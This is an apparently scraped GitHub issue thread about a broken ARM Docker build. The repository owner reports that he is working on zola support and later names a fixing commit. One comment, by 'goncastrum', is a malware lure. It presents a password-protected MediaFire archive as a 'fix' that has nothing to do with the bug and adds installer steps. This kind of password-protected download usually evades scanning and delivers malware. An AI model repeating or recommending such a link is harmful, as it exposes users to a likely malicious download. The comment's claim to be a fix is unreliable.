### ISSUE TITLE
bug: docker build for arm broken

### ISSUE THREAD

**Issue by hegerdes** [hegerdes/HomePage#41]

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by hegerdes** [comment]
Working on zola to support linux arm builds

**Comment by hegerdes** [comment]
fixed in e9fde58183e4df3d03a5cda4da2c0f589ebebcc6

arch agnostic build one new zola is released
